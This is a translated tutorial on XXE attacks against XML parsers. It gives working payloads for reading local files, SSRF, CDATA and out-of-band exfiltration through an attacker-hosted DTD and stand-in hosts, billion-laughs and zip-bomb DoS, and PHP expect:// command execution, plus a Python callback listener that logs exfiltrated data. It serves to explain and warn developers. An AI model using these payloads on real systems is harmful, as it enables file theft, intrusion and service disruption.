XML File Security Analysis

Source: Internet
Author: User


XML (eXtensible Markup Language) is designed for transporting and storing data. It appears in many forms:

1. Document formats (OOXML, ODF, PDF, RSS, DOCX, ...)

2. Image formats (SVG, EXIF headers, ...)

3. Configuration files (custom names, usually with a .xml extension)

4. Network protocols (WebDAV, CalDAV, XML-RPC, SOAP, REST, XMPP, SAML, XACML, ...)

Some XML features, such as XML Schemas (defined by the XML Schema specifications) and document type definitions (DTDs), are sources of security issues. Although these issues have been discussed publicly for the past decade, a great deal of software still falls victim to XML attacks.

In fact, the XML entity mechanism is easy to understand if you think of it as escaping: the predefined entity &amp; and a custom entity such as &foo; work the same way, except that the latter is defined by ourselves.
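As a quick illustration of this escaping view, the sketch below uses Python's standard xml.etree.ElementTree (our choice of tool, not the article's). It declares a hypothetical entity foo in the internal DTD subset and shows that both &foo; and the predefined &amp; are replaced with text during parsing.

```python
import xml.etree.ElementTree as ET

# "foo" is a hypothetical custom entity declared in the internal DTD subset.
DOC = """<?xml version="1.0"?>
<!DOCTYPE note [
  <!ENTITY foo "bar">
]>
<note>&foo;&amp;</note>"""


def expanded_text(doc: str) -> str:
    """Parse the document and return the root element's text after entity replacement."""
    return ET.fromstring(doc).text


print(expanded_text(DOC))  # bar&
```

The custom entity and the built-in one end up indistinguishable in the parsed text; the only difference is where the replacement text was defined.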

Entities can be declared in a DTD to define variables (or text macros) for use later in the DTD or in the XML document. An internal entity is defined inside the DTD itself, and its text replaces each reference to it in the document. An external entity is used to access external resources, which can reside on the local computer or on a remote host. While resolving external entities, the XML parser may use many network protocols and services (DNS, FTP, HTTP, SMB, etc.), depending on the scheme specified in the URL. External entities are useful for documents whose content is updated in real time, but resolving them also opens the door to attacks, including:

Reading local files (which may contain sensitive information, e.g. /etc/shadow)

Memory intrusion

Arbitrary Code Execution

Denial of Service

This article summarizes these long-standing XML attack methods.

0x01 A first look at XML external entity attacks

File inclusion based on external entities

The earliest XML attack method proposed uses external entity references to read arbitrary files:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE updateProfile [
  <!ENTITY file SYSTEM "file:///c:/windows/win.ini">
]>
<updateProfile>
  <firstname>Joe</firstname>
  <lastname>&file;</lastname>
  ...
</updateProfile>
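Before any parser resolves anything, the declarations already reveal which resources a document asks for. The sketch below uses Python's xml.parsers.expat (our choice of tool) to list every entity declared with a SYSTEM identifier and whether it is a parameter entity. Expat performs no I/O itself, and because no external-entity handler is installed, the reference &file; is simply skipped, so nothing is read. The helper name external_entity_urls is hypothetical.

```python
from xml.parsers import expat

PAYLOAD = b"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE updateProfile [
  <!ENTITY file SYSTEM "file:///c:/windows/win.ini">
]>
<updateProfile><firstname>Joe</firstname><lastname>&file;</lastname></updateProfile>"""


def external_entity_urls(doc: bytes) -> list:
    """List (name, is_parameter_entity, system_id) for every entity declared with SYSTEM."""
    found = []

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        # Internal entities have a value and no system identifier; skip them.
        if system_id is not None:
            found.append((name, bool(is_parameter_entity), system_id))

    parser = expat.ParserCreate()
    parser.EntityDeclHandler = on_entity_decl
    # No ExternalEntityRefHandler is set, so expat skips &file; instead of loading it.
    parser.Parse(doc, True)
    return found


print(external_entity_urls(PAYLOAD))
```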

However, this method is limited, because the XML parser requires the referenced data to be well-formed. The following example shows what that means:

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE simpleDocument [
  <!ENTITY first "<my">
  <!ENTITY second "tag/>">
]>
<simpleDocument>&first;&second;</simpleDocument>

When this document is sent to the server, an error occurs. Although the two entities would form a complete tag when combined, each entity is parsed on its own when it is referenced, and because neither one is well-formed by itself, the parser throws an error.
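This behavior can be reproduced with the expat-based parser bundled with Python. The sketch below (the helper is_well_formed and the WHOLE variant are ours, not the article's) parses the document above and a variant in which a single entity carries the complete tag; only the split version is rejected.

```python
import xml.etree.ElementTree as ET

# The document from the article: the tag is split across two entities.
SPLIT = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE simpleDocument [
  <!ENTITY first "<my">
  <!ENTITY second "tag/>">
]>
<simpleDocument>&first;&second;</simpleDocument>"""

# Hypothetical variant: one entity carries the complete tag.
WHOLE = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE simpleDocument [
  <!ENTITY whole "<mytag/>">
]>
<simpleDocument>&whole;</simpleDocument>"""


def is_well_formed(doc: str) -> bool:
    """Return True if the parser accepts the document, False on a parse error."""
    try:
        ET.fromstring(doc)
    except ET.ParseError:
        return False
    return True


print(is_well_formed(SPLIT), is_well_formed(WHOLE))  # False True
```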

This kind of error once made XML attacks quite messy, because many files are not well-formed in this sense. For example, the recommended style for PHP files includes only the opening "<?php" tag and omits the closing "?>". Worse, when the included file is itself a complete XML document (such as a database connection configuration file), the returned result looks like this:

<updateProfile>
  <firstname>Joe</firstname>
  <lastname>
    <configroot>
      <various>...</various>
      <configurations>...</configurations>
    </configroot>
  </lastname>
</updateProfile>

As you can see, when the database configuration document is embedded in the tag, the parser treats it as markup: most of the content is lost (shown as ellipses) and only the structure of the document is displayed. This is a consequence of how the XML parser works.

URL Invocation

 

One often-overlooked class of XML attacks abuses URL schemes and their quirks to expand the attack surface. Although the XML specification does not require support for any particular URL scheme, the underlying network libraries on many platforms support almost all of them. Through URLs, an attacker can make the host running the XML parser send malicious requests to third-party hosts, which is known as server-side request forgery (SSRF). In theory, URL invocation can even be used to launch flooding attacks inside an internal network.

What most people do not realize is that even when external entities are disabled, many XML parsers still resolve these URLs. For example, some parsers request the URL given in the DOCTYPE declaration:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://internal/service?ssrf">
<roottag>This is not a real attack</roottag>
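The DOCTYPE's system identifier can be observed without fetching it. The sketch below uses the StartDoctypeDeclHandler callback of Python's xml.parsers.expat; expat does no network I/O of its own, so it only records the URL that a less careful parser would request. The helper name doctype_identifiers is hypothetical.

```python
from xml.parsers import expat

DOC = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottag PUBLIC "-//VSR//PENTEST//EN" "http://internal/service?ssrf">
<roottag>This is not a real attack</roottag>"""


def doctype_identifiers(doc: bytes) -> dict:
    """Record the DOCTYPE name and its public/system identifiers without fetching anything."""
    found = {}

    def on_start_doctype(name, system_id, public_id, has_internal_subset):
        found.update(name=name, system_id=system_id, public_id=public_id)

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_start_doctype
    parser.Parse(doc, True)
    return found


print(doctype_identifiers(DOC)["system_id"])  # http://internal/service?ssrf
```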

Besides external entities and DOCTYPE-based SSRF, XML Schema provides two special attributes that an instance document can use to indicate where its schema documents are located: xsi:schemaLocation and xsi:noNamespaceSchemaLocation. The former declares schema documents for namespaces, and the latter declares a schema document that has no target namespace. Both are typically used in instance documents:

 
<roottag xmlns="http://schema/namespace/primary"
         xmlns:secondaryns="http://schema/namespace/secondary"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://schema/namespace/primary
                             http://location/of/remote/schema/primary.xsd
                             http://schema/namespace/secondary
                             http://location/of/remote/schema/secondary.xsd">
  <p>
    <secondaryns:s>
    ...
    </secondaryns:s>
  </p>
</roottag>

In this case, all elements with the secondaryns: prefix belong to the namespace declared by xmlns:secondaryns. Because a DOCTYPE declaration cannot appear in the middle of a document, when we control only part of the document we can use the schema location (http://location/of/remote/schema/primary.xsd) to trigger SSRF. (This requires certain parser settings to be turned on. We have not fully tested every XML parser to determine what it takes to trigger SSRF in different environments, so this remains an open direction for research. If you are interested, WooYun users are welcome to discuss it with us.)
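To see which remote schema documents an instance document points at, one can read its xsi:schemaLocation attributes, whose value is a whitespace-separated list of namespace/location pairs. The Python sketch below only extracts those URLs with xml.etree.ElementTree; it does not fetch or validate anything, and the helper name schema_locations is hypothetical.

```python
import xml.etree.ElementTree as ET

XSI_SCHEMA_LOCATION = "{http://www.w3.org/2001/XMLSchema-instance}schemaLocation"

DOC = """<roottag xmlns="http://schema/namespace/primary"
         xmlns:secondaryns="http://schema/namespace/secondary"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://schema/namespace/primary
                             http://location/of/remote/schema/primary.xsd
                             http://schema/namespace/secondary
                             http://location/of/remote/schema/secondary.xsd">
  <p><secondaryns:s>...</secondaryns:s></p>
</roottag>"""


def schema_locations(doc: str) -> dict:
    """Map each namespace URI to the schema URL declared for it, on any element."""
    pairs = {}
    for elem in ET.fromstring(doc).iter():
        value = elem.get(XSI_SCHEMA_LOCATION)
        if value:
            tokens = value.split()  # newlines were already normalized to spaces
            pairs.update(zip(tokens[0::2], tokens[1::2]))
    return pairs


for namespace, location in schema_locations(DOC).items():
    print(namespace, "->", location)
```

Because the attribute may sit on any element, not just the root, the sketch walks the whole tree; this matches the article's point that a partially controlled document is enough.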

0x02 Attack methods using parameter entities

Even when our malicious XML is parsed successfully, we may face two problems:

1. The data is not well-formed, so embedding it fails (for example, the file contains an opening tag without its closing counterpart).

2. The data cannot be returned because of server-side restrictions.

Parameter entities solve both problems. A parameter entity is declared and referenced with %. Only two rules need to be kept in mind: parameter entities can only be used within the DTD, and they cannot be referenced in the XML document body.

Escaping with CDATA

All content inside a CDATA section is ignored by the XML parser as far as markup is concerned; that is, the content of a CDATA section is treated purely as character data. A CDATA section starts with "<![CDATA[" and ends with "]]>". So can we construct a document like the following to return those files?

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
  <!ENTITY % start "<![CDATA[">
  <!ENTITY % goodies SYSTEM "file:///etc/fstab">
  <!ENTITY % end "]]>">
  <!ENTITY % dtd SYSTEM "http://evil.example.com/combine.dtd">
  %dtd;
]>
<roottag>&all;</roottag>

combine.dtd:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY all "%start;%goodies;%end;">

As mentioned above, the XML parser expands entities as soon as they are referenced, so one might expect %start; and %end; to cause an error because neither is closed on its own. Why, then, can %start; be parsed normally? Because parameter entity references used inside the DTD do not have to be well-formed individually: combine.dtd simply concatenates "<![CDATA[", the file contents, and "]]>" into the value of the general entity all, and &all; then expands to one complete CDATA section. This bypasses the restriction and lets us read all of the data (base64 encoding is also supported).
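The effect CDATA has on markup-like content can be checked directly. In the Python sketch below, hypothetical file contents that look like markup (including an undefined entity reference) come back as plain text when wrapped in a CDATA section, while the same contents without CDATA are rejected by the parser.

```python
import xml.etree.ElementTree as ET

# Hypothetical file contents that look like markup and contain an undefined entity reference.
FILE_CONTENTS = "<configroot>&undefined;</configroot>"


def parses(doc: str) -> bool:
    """Return True if the parser accepts the document."""
    try:
        ET.fromstring(doc)
    except ET.ParseError:
        return False
    return True


wrapped = ET.fromstring("<roottag><![CDATA[" + FILE_CONTENTS + "]]></roottag>")
print(repr(wrapped.text), len(wrapped))  # '<configroot>&undefined;</configroot>' 0

# Without CDATA the contents are parsed as markup and &undefined; is rejected.
print(parses("<roottag>" + FILE_CONTENTS + "</roottag>"))  # False
```

One limitation follows from the syntax: if the file itself contains the sequence "]]>", the CDATA section ends early and the trick no longer yields well-formed text.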

Bypassing output restrictions with out-of-band (OOB) data

With parameter entities, we can send the contents of the file being read to our own server over a protocol such as HTTP or FTP, and then retrieve the data from the server logs.

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE roottag [
  <!ENTITY % file SYSTEM "file:///c:/windows/win.ini">
  <!ENTITY % dtd SYSTEM "http://example.com/evil.dtd">
  %dtd;
]>
<roottag>&send;</roottag>

Then place the following DTD (evil.dtd) on http://example.com/, which we control:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://example.com/?%file;'>">
%all;

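The process is as follows. The parser first expands %dtd; and fetches evil.dtd from our server. Expanding %all; inside that DTD declares the general entity send, whose URL embeds the contents of %file;. When the document body references &send;, the parser requests http://example.com/?<contents of win.ini>, and the file contents appear in our server's access log.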
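On the receiving side, http://example.com/ has to serve evil.dtd and record the query string of the follow-up request. The sketch below uses Python's http.server; the handler name, the default bind address and port, and serving both steps from one process are our assumptions, not the article's setup.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import unquote, urlsplit

# Contents of evil.dtd, copied from the DTD shown above.
EVIL_DTD = (
    b'<?xml version="1.0" encoding="UTF-8"?>\n'
    b"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://example.com/?%file;'>\">\n"
    b"%all;\n"
)


def exfiltrated_data(request_path: str) -> str:
    """Return the URL-decoded query string of a callback request path."""
    return unquote(urlsplit(request_path).query)


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if urlsplit(self.path).path == "/evil.dtd":
            # Step 1: the vulnerable parser fetches the external DTD.
            body = EVIL_DTD
        else:
            # Step 2: the parser requests the URL of the send entity;
            # the file contents arrive in the query string and are logged to stderr.
            self.log_message("exfiltrated: %r", exfiltrated_data(self.path))
            body = b""
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def run(host: str = "0.0.0.0", port: int = 80) -> None:
    """Serve until interrupted; host and port are assumptions, not from the article."""
    HTTPServer((host, port), CallbackHandler).serve_forever()
```

Calling run() starts the listener. exfiltrated_data() is kept separate so that the decoding step can be checked without any network traffic.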

Unconventional XXE tricks

XInclude-based file inclusion

XInclude provides a more convenient way to retrieve data, since we no longer have to worry about malformed data causing the parser to throw an error. The parse attribute lets us force the included file to be treated as text:

<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include href="file:///etc/fstab" parse="text"/>
</root>

However, XInclude must be enabled manually; in our tests, every XML parser had it disabled by default.
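Python's standard library offers a convenient way to see parse="text" at work: xml.etree.ElementInclude processes xi:include elements only when include() is called explicitly, loosely mirroring the opt-in behavior described above. The sketch below passes a hypothetical fake_loader so that nothing is actually read from disk; it only shows where the included text ends up.

```python
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude

DOC = (
    '<root xmlns:xi="http://www.w3.org/2001/XInclude">'
    '<xi:include href="file:///etc/fstab" parse="text"/>'
    "</root>"
)


def fake_loader(href, parse, encoding=None):
    """Hypothetical loader: returns a placeholder instead of reading href."""
    return f"[{parse} contents of {href}]"


def resolve_xinclude(doc: str) -> ET.Element:
    """Parse doc, then explicitly run XInclude processing with the fake loader."""
    root = ET.fromstring(doc)
    ElementInclude.include(root, loader=fake_loader)
    return root


root = resolve_xinclude(DOC)
print(root.text)  # [text contents of file:///etc/fstab]
```

With parse="text" the included data becomes character data of the parent element, so its well-formedness never matters, which is exactly why the article calls XInclude more convenient.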

Denial of Service

XXE attacks can also be used to launch denial-of-service attacks. In the following payload, the nested entity references grow exponentially at each level:

<?xml version="1.0"?>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
  <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
  <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
  <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
  <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

 

Consider the parsing process. When the XML processor loads this document, it finds that the root element contains the entity &lol9;, which expands to ten references to &lol8; ("&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"), each of which expands to ten references to &lol7;, and so on down to &lol;. The amount of data pushed into memory therefore grows exponentially. Experiments found that an XML payload like this, smaller than 1 KB, can consume 3 GB of memory.
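The growth can be checked with a little arithmetic instead of actually expanding the payload. The Python sketch below models each entity in the lolz payload as its literal length plus the entities it references (this table is our model of the payload, not parser output) and computes the fully expanded length with memoization.

```python
from functools import lru_cache

# Model of the lolz payload: entity name -> (literal characters, referenced entities).
# lol is the literal "lol"; lol2 references &lol; ten times; lolN references lol(N-1) ten times.
ENTITIES = {"lol": (len("lol"), ())}
ENTITIES["lol2"] = (0, ("lol",) * 10)
for n in range(3, 10):
    ENTITIES[f"lol{n}"] = (0, (f"lol{n - 1}",) * 10)


@lru_cache(maxsize=None)
def expanded_length(name: str) -> int:
    """Characters produced by fully expanding &name; (computed without expanding it)."""
    literal, refs = ENTITIES[name]
    return literal + sum(expanded_length(ref) for ref in refs)


print(expanded_length("lol9"))  # 300000000
```

For the payload exactly as listed, &lol9; expands to 10^8 copies of "lol", i.e. 300,000,000 characters. The widely circulated "billion laughs" variant adds one more level (a lol1 entity between lol and lol2), which yields 10^9 copies and 3,000,000,000 characters. Actual memory use also depends on how the parser stores text internally.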

Attacks and restrictions in specific environments

By default, the XML parser in Oracle's Java Runtime Environment is Xerces, an Apache project. Xerces and Java provide a range of features that can lead to serious security problems. All of the attacks above (DOCTYPE-based SSRF, file reading, and OOB data exfiltration via parameter entities) work in Java's default configuration. Java/Xerces also supports XInclude, but it requires setXIncludeAware(true) and setNamespaceAware(true).

The Java specification supports the following URL schemes:

http, https, ftp, file, jar

Surprisingly, the file protocol in Java can be used to list directories. For example, on Linux, "file:///" lists all the entries in the / directory:

bin boot dev etc home ...

The jar protocol, e.g. jar:http://host/application.jar!/file/within/the/zip, causes the server to first fetch the archive, decompress it, and then extract the file named after the "!". From an attacker's point of view, we can craft highly compressed archives (for example with a 1000:1 ratio). Such ZIP bombs can be used to attack antivirus systems or to exhaust the disk or memory resources of the target machine. Note that jar URLs can be used on any Java/Xerces system that accepts DOCTYPE declarations, so the system can be attacked even when external entities are disabled.
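To get a feel for the compression ratios involved, the Python sketch below builds a ZIP archive in memory whose single entry (named after the path in the jar: URL above) is 10 MiB of zero bytes, and reports how much smaller the compressed entry is. The entry contents and size are our assumptions. DEFLATE, the method ZIP and JAR archives normally use, cannot exceed roughly 1032:1, so highly redundant data like this typically lands in the neighborhood of the 1000:1 figure mentioned above.

```python
import io
import zipfile

ENTRY = "file/within/the/zip"  # entry name borrowed from the jar: URL above


def deflate_ratio(size: int) -> float:
    """Zip `size` zero bytes in memory and return uncompressed/compressed size."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w", compression=zipfile.ZIP_DEFLATED) as archive:
        archive.writestr(ENTRY, b"\0" * size)
    # ZipFile leaves a caller-supplied file object open, so it can be reread.
    with zipfile.ZipFile(buffer) as archive:
        info = archive.getinfo(ENTRY)
        return info.file_size / info.compress_size


print(f"{deflate_ratio(10 * 1024 * 1024):.0f}:1")
```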

PHP expect RCE

Unfortunately, the PHP expect extension is not installed by default. However, where it is installed, an XXE vulnerability can be used to execute arbitrary commands:

<!DOCTYPE root [<!ENTITY cmd SYSTEM "expect://id">]>
<dir>
  <file>&cmd;</file>
</dir>

The following is returned:

<file>uid=501(Apple) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),401(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),398(com.apple.access_screensharing),399(com.apple.access_ssh)</file>

XML injection

This is not closely related to XXE, but since this article covers XML security, it is included here. In PHP, $GLOBALS["HTTP_RAW_POST_DATA"] is not escaped. If a program takes data obtained through an entity and passes it straight into a MySQL query, SQL injection results.

XXE attacks are often ignored. Developers frequently argue that the risk is low and that turning off entities avoids the attack entirely, so why worry about XML entity attacks at all? However, XML entity attacks have produced many threats that developers did not anticipate.
